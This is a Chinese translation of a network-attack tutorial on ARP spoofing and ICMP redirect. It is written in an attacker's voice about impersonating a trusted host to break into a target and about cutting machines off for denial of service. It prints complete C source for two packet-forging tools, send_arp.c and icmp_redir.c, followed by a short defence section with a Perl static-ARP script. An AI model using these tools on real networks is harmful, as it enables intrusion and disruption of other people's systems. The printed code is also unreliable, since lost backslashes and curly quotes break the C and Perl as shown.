对于旁观者来说，事物的缺点和优点往往是同时存在的。我很高兴可以向你们显示两
个正规的协议——arp和icmp，当你用一些特殊的方法使用它们的时候，却得到意想不到的结果。
相对于被动攻击（网络监听sniffing）来说，主动攻击使用的并不普遍——许多管理
员都拥有一个网络监听工具，帮助他们管理局域网。在你的LAN中，主动攻击将会给你的生活添
加光彩和乐趣。你知道，仅仅是一些技术细节使得这些角落有些昏暗不明。那么，我们去看看
那里究竟有些是什么。
我们首先描述一下网络欺骗（spoofing）和拒绝服务（DoS-deny of service）。象IP
盲攻击一样，网络攻击常常非常普通并且功能强大，但是对使用者来说，需要做大量的工作（常
常是猜），而且难于实行。但是ARP欺骗正好相反，它非常容易使用且方便。

一、ARP欺骗

ARP欺骗往往应用于一个内部网络，我们可以用它来扩大一个已经存在的网络安全漏洞。
如果你可以入侵一个子网内的机器，其它的机器安全也将受到ARP欺骗的威胁。
让我们考虑一下的网络结构
IP 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4
hostname cat rat dog bat
hw addr AA:AA BB:BB CC:CC DD:DD
所有的主机在以太网中以简单的方式进行连接（没有交换机，智能HUB）。你是cat，你
具有root权限，你的目标是侵入dog。而你知道dog信任rat，所以如果你能伪装成rat，那么你就
能获得一些意外的东西。
也许你首先想到的是，“为什么我不把我的IP设成rat的，然后…”，这种方式无法工
作，无法可靠的工作。如果你将cat的IP设置成10.0.0.2，那么cat将以这个IP回答ARP请求。但
是rat也会的。这样你们就进入了一个纯粹的竞争状态，而这场比赛没有赢家。相反的，你会轻
易的输掉这场比赛，因为许多工具会立即发现这种IP冲突的现象，抱怨之声随之而来。一些网络
交通分析工具还常常对它进行纪录。在网络管理员的日志文件中还会保留一条恶心的纪录（cat
的物理地址），这可不是你想要的。你的不到你想要的东西，并且与你的目标背道而驰。
这个东西是你想要的，一个攻击程序——send_arp.c，一个非常有效的工具。正如它的
名字所示，它发送一个ARP包（ARP回答，准确的说：由于这个协议是无状态的，即使在没有请求
的时候也可以做出应答。请求同应答是一样的。）向网络上，你可以把这个包做成你想要的样子。
而你想要的只不过是可以去定制源IP与目的IP，还有硬件地址。
当你进行ARP欺骗的时候，你不希望你的网卡乱说话，那么你可以用“ifconfig eth0 -arp”
关掉你的ARP协议。当然，无论如何你都需要ARP的信息，手动的构建它并使它发向内核。重要的
事你要获得你周围人们的信任。在这个例子中，你希望dog认为rat的硬件地址是AA:AA（cat），
所以你发送一个ARP应答，它的源地址是10.0.0.2,源硬件地址是AA:AA,目标地址是10.0.0.3和目
标硬件地址是CC:CC。现在，dog完全相信rat的硬件地址是AA:AA。当然dog中缓存会过期，所以它
需要更新（重新发送请求）。多长时间发出请求，各个操作系统不同，但是大多来说是40秒钟左
右。经常发送ARP应答，这对你来说不会有坏处的。
对于ARP缓存处理方法的不同会带来问题的复杂性。一些操作系统（例如Linux）会用向
缓存地址发非广播的ARP请求来要求更新缓存（就象你妻子打电话来看你在不在一样）。这种缓
存更新会给你增加麻烦，会使你刚刚伪造的ARP缓存被更改掉，所以必须避免此事发生。经常的
向dog发出应答数据，这样它就不会发出请求。正是预防为主。对于rat来说，它根本就没有机会
来改变这一切。
所以过程是简单的。首先来设置网络接口别名（ifconfig eth0:1 10.0.0.2），添加rat
的IP地址并且打开ARP协议（ifconfig eth0 arp）——你需要设置你的ARP缓存，当没有ARP时，
它不会工作。然后在正确的网络接口上设置到dog的路由。再设置dog的ARP缓存。最后，关掉网络
接口的ARP功能。这样一切就OK了。
现在，当你用send_arp将毒液注入之后（dog和rat），那么，dog就会认为，你就是rat。
一定要记住，要持续不断的向dog和rat发出ARP包。
这种攻击方式就仅仅工作在局域网内（通常的，ARP包是不会路由的）。一个有趣的尝试
是，把我们上述试验中dog替换成路由器，如果可以实现的话（我不确定它是否会永远成立，路由
器的ARP功能不是那么容易欺骗的），你可以轻易的冒充这个局域网内的机器去欺骗这个Internet
世界了。所以目标可以是任何一台机器，但是你要伪装的机器，必须是这个局域网内的。
除了欺骗以外，你还可以用ARP作很多事。蓝天之下，皆可任你遨游。或者，DoS也是一个
非常有用的程序。
给rat一个错误的硬件地址，是一个非常有效的让它闭嘴的方法。你可以避免它向一些特
殊的机器发出请求（一个ARP缓冲池通常可以容括整个网络的内容，所以你可以在一段时间内有效
的防止它向其它机器发出请求）。非常明显目标也可以是一台路由器。干扰缓存需要两步：搅乱被
伪装的机器和你不希望它与之通讯的机器。这种方法不是常常奏效，当这台机器发现缓存中没有目
标机器时，会主动发出ARP请求。当然你的下一滴毒液会迅速注入，但是你需要经常维持这种状态。
一个比较有效的方法是，给rat一个错误的dog硬件地址，这样rat既能保持正常的工作状态，又不
会干扰你的活动。同样的，这种方法也依赖于不同的环境，通常的情况是rat会经常的向错误的目
标发出各种不同的包，目标会返回ICMP不可抵达信息，从而用一种不正当的方式维持了连接。这种
伪装的连接可以推迟缓存的更新时间。在Linux上，我们可以是更新时间从1分钟提升到10分钟。在
这一段时间内，你已经可以完成一个TCP连接可以完成的大多数事情了。
这里存在一个有趣被称为“无理ARP”。在这个ARP请求包中，源IP与目的IP是相同的，通
常它是经过以太网广播进行发送。一些执行程序认为这是一种特殊情况——系统发出的自身更新信
息，并且将这个请求添加在自己的缓存中。这种方式里，影响的是整个网络。这是毋庸置疑的，但
这并不是ARP协议的一部分，而是由执行者决定是否作（或是不作），这渐渐的变得不受人欢迎。
ARP也可以用来开一些非常专业的笑话。假想一下某人设置了一个中继器或者是一个管道，
仅仅是利用自己的机器去骗取两台相邻机器的信任，并且把通讯的包都发给这台机器。如果这台机
器仅仅是转发数据，那么谁也不会发现。但是当它仅仅作一些很少的改动时，就会给你添加非常大
的麻烦。例如，随机的更改数据包中的几位，这样就会造成校验和错误。数据流好像是毫发无损，
却会毫无原因的出现不可预料的错误。

二、ICMP重定向

另外一个比较有效的并且类似与ARP欺骗的手段是利用另外一个正常的协议——ICMP重
定向。这种重定向通常是由你的默认路由器发来的，通告你有一个到达某一网络的更近的路由。
最初，既可以通告网络重定向，也可以通告主机的重定向，但是现在，由于网络重定向被否决，
仅剩下了主机重定向。正确的制作一个经过完整检查的ICMP包（必须由默认路由器发来，发向重
定向机器，新的路由应该是一个网络的直接连接等等），接收者会对系统的路由表进行更新。
这是ICMP的安全问题。伪装一个路由器的IP地址是简单的，icmp_redir.c正是作的这个
工作。RFC声明系统必须遵循这个重定向，除非你是路由器。实际上几乎所有的系统都支持这一
点（除了vanilla Linux 2.0.30）。
ICMP重定向提供了一个非常有力的DoS工具。不像ARP缓存更新，路由表不存在的过期问
题。并且不需要在本地网络，你可以发起攻击从任何地方。所以当目标接受了ICMP重定向之后（
包确切抵达），目标就不会再和网络上的一些机器进行通讯（是的，并不是所有的机器，但是一
些与目标机器不在同一个网络上的机器）。域名服务器会是一个非常好的攻击目标。

/* send_arp.c
这个程序发送ARP包，由使用者提供源/目的IP和网卡地址。编译并运行在Linux环境下，
也可以运行在其它的有SOCK_PACKET的Unix系统上。
这个程序是对上述理论的验证，仅此而已。
*/

#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>

#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2

#define DEFAULT_DEVICE "eth0"

char usage[]={"send_arp: sends out custom ARP packet.n
tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addrnn"};

struct arp_packet {
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};

void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);

int main(int argc,char** argv){

struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;

if(argc != 5)die(usage);

sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
perror("socket");
exit(1);
}

pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);

get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);

get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);

memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

bzero(pkt.padding,18);

strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}

void die(char* str){
fprintf(stderr,"%sn",str);
exit(1);
}

void get_ip_addr(struct in_addr* in_addr,char* str){

struct hostent *hostp;

in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
if( (hostp = gethostbyname(str)))
bcopy(hostp->h_addr,in_addr,hostp->h_length);
else {
fprintf(stderr,"send_arp: unknown host %sn",str);
exit(1);
}
}
}

void get_hw_addr(char* buf,char* str){

int i;
char c,val;

for(i=0;i<ETH_HW_ADDR_LEN;i++){
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-‘0’;
else if(c >= ‘a’ && c <= ‘f’) val = c-‘a’+10;
else die("Invalid hardware address");

*buf = val << 4;
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-‘0’;
else if(c >= ‘a’ && c <= ‘f’) val = c-‘a’+10;
else die("Invalid hardware address");

*buf++ |= val;

if(*str == ‘:’)str++;
}
}

—
and
—

/* icmp_redir.c
本程序由用户提供的网关地址发送了一个ICMP主机重定向数据包。在Linux2.0.30
上测试通过，并且对大多数的Unix机器有效。
这个程序是对上述理论的验证，仅此而已。
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <syslog.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>

#define IPVERSION 4

struct raw_pkt {
struct iphdr ip; /* This is Linux-style iphdr.
Use BSD-style struct ip if you want */
struct icmphdr icmp;
struct iphdr encl_iphdr;
char encl_ip_data[8];
};

struct raw_pkt* pkt;

void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);

int main(int argc,char** argv){

struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet.
yuri volobuev’97n
tusage: icmp_redir gw_host targ_host dst_host dummy_hostn"};
char on = 1;

if(argc != 5)die(usage);

if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
perror("socket");
exit(1);
}

sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;

packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);

pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));

pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);

memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
sizeof(struct iphdr));

pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
sizeof(struct raw_pkt)-sizeof(struct iphdr));

if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt: IP_HDRINCL");
exit(1);
}

if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}

void die(char* str){
fprintf(stderr,"%sn",str);
exit(1);
}

unsigned long int get_ip_addr(char* str){

struct hostent *hostp;
unsigned long int addr;

if( (addr = inet_addr(str)) == -1){
if( (hostp = gethostbyname(str)))
return *(unsigned long int*)(hostp->h_addr);
else {
fprintf(stderr,"unknown host %sn",str);
exit(1);
}
}
return addr;
}

unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;

while(len > 1){
sum += *addr++;
len -= 2;
}
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);

return ~sum;
}

三、解决方案

对于大多数人来说，ARP是一个隐藏的底层协议。你可以时不时的观察它，但是平常不
会有人对它发生兴趣。你可以用arp命令来检查你的ARP缓存，但是当一个网络出现问题的时候，
这个并不是我们首先想到的。Windows也存在这个命令，记住这一点也许对你有帮助。但是当一
个ARP欺骗通过网关从另一个网络发向你时，恐怕你也无能为力了。同样的，你也可以在你的路
由表中发现重定向的路由信息（route 命令，用“D”标志来标明）。
ARP攻击设计来攻击10Base2以太网。如果网络已一些比较先进的方式进行连接，通常是
智能HUB或交换机，那么攻击就很容易被发现，甚至是不可能的（类似于被动攻击）。所以这是
一个向你的老板要求更新网络设备的理由。
这么想起来，ICMP重定向真是一个非常疯狂的想法。首先，一些网络的结构非常简单，
对路由表不需要任何添加；其次，大多数的稳定的网络上，仅仅是用手动的办法来更新路由。这
并不是一个经常更新的工作，为什么要通过ICMP呢？最后，这个对于你来说是非常危险的，你可
以在你的系统上关闭ICMP重定向，这样可以减少同RFC1122的冲突。哎，这可不容易呀！在Linux
这种提供源码的机器上，你可以重新编译内核。在Irix 6.2和一些其它的系统上，可以“set
icmp_dropredirects=1”。这与其它的OS，我也不知道有什么办法。
时间证明了这个真理：不要信任未确认的主机。否则，网络上帝不会对你施予怜悯的。
一些人认为“我有防火墙，我怕谁”，认为一些安全问题对它来说无关紧要。我承认防
火墙的作用，但是这并不是经常有效。
想象这样一个环境，所有的机器都直接与Internet相连，你不得不与你不了解的人共用
你的内部网，他们使用的是vanilla SGI 的机器，而他们简直是在到处告诉别人“来攻击我吧，
我的买主使它非常简单”（是这样的，那些人认识Unix，从侏罗纪公园…），另外，通向你的
路由器由别的机构控制。让我们来到一个标准的网络环境，它会提供我们安全，不受外部的攻击。
人们在这里工作，使用电脑。同样，这里的每台机器也存在安全问题。所以，当你下一次提到防
火墙的时候，请记住它并不能保护每一个人。
John Goerzen提供了一个Perl脚本，可以在系统启动时运行。它主要是在Linux机器中
维持一个已知的IP地址与硬件地址的缓存，设置标志，以使其不会被更新和改变。配置文件非常
简单——IP addr 配 MAC addr，用空格键分割，“#”作为注释。
这个脚本仅仅在Linux机器上测试过——在其它平台上的人需要修改arp命令的格式。
注意：脚本需要运行在网络接口启动之后，服务和客户运行之前；另外，一些人会在
ARP被锁定时窃取连接。以下是它的脚本：
#!/usr/bin/perl
# Program: forcehwaddr
# Program to run ARP to force certain tables.

# Specify filenames to read from on command line, or read from stdin.

foreach (<>) { # For each input line….
chomp; # Strip if CR/LF
if (/^#/) { next; } # If it’s a comment, skip it.
if (((($host, $hw) = /s*(.+?)s+(S+)s*/) == 2) &&
!(/^#/)) {
# The text between the slashes parses the input line as follows:
# Ignore leading whitespace. (s*)
# Then, start matching and put it into $host ($host, (.+?))
# Skip over the whitespace after that (s+)
# Start matching. Continue matching until end of line or optional
# trailing whitespace.

# Then, the if checks to see that both a
# host and a hardware address were matched.
# (2 matches). If not, we skip the
# line (assuming it is blank or invalid or something).
# The second part of the if checks to see if the line starts with
# a pound sign; if so, ignore it (as a comment).

# Otherwise, run the appropriate command:
printf("Setting IP %-15s to hardware address %sn", $host, $hw);
system "/usr/sbin/arp -s $host $hwn";
}
}